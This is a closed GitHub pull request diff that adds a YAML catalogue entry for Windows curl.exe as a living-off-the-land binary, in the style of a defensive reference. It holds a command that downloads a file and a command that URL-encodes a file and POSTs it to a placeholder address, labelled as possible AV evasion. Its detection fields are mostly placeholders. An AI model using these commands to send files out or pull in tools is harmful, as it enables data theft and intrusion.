Skip to content
Closed
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
41 changes: 41 additions & 0 deletions yml/OSBinaries/CurlFinal.yml
Original file line number Diff line number Diff line change
@@ -0,0 +1,41 @@
---
Name: Curl.exe
Description: While the curl command in Powershell is just an alias for
Invoke-WebRequest, curl.exe has much of the functionality of its Linux
Counterpart. This may be able to be expanded.
Aliases:
- Alias: null
Author: John Fawcett (5HR3K)
Created: 2026-05-19
Commands:
- Command: curl.exe -o newfile.txt https://www.example.com/file.txt
Description: Download a file
Usecase: Another method of downloading
Category: Download
Privileges: User
MitreID: Ingress Tool Transfer
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Key1: Download
- Command: curl.exe --data-urlencode "<file>" https://<sent address>
Description: Encode file and send via a POST request
Usecase: Possible AV Evasion
Category: Encoding
Privileges: User
MitreID:T1027.013: Encrypted/Encoded File
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
- Path: c:\windows\system32\curl.exe
Code_Sample:
- Code: null
Detection:
- IOC: Event ID 10
- IOC: binary.exe spawned
- Analysis: https://example.com/to/blog/gist/writeup/if/applicable
- Sigma: https://example.com/to/sigma/rule/if/applicable
- Elastic: https://example.com/to/elastic/rule/if/applicable
- Splunk: https://example.com/to/splunk/rule/if/applicable
- BlockRule: https://example.com/to/microsoft/block/rules/if/applicable
Resources: null
Acknowledgement: null

Check failure on line 41 in yml/OSBinaries/CurlFinal.yml

View workflow job for this annotation

GitHub Actions / lintFiles

41:1 [trailing-spaces] trailing spaces

Check failure on line 41 in yml/OSBinaries/CurlFinal.yml

View workflow job for this annotation

GitHub Actions / lintFiles

41:1 [trailing-spaces] trailing spaces
Loading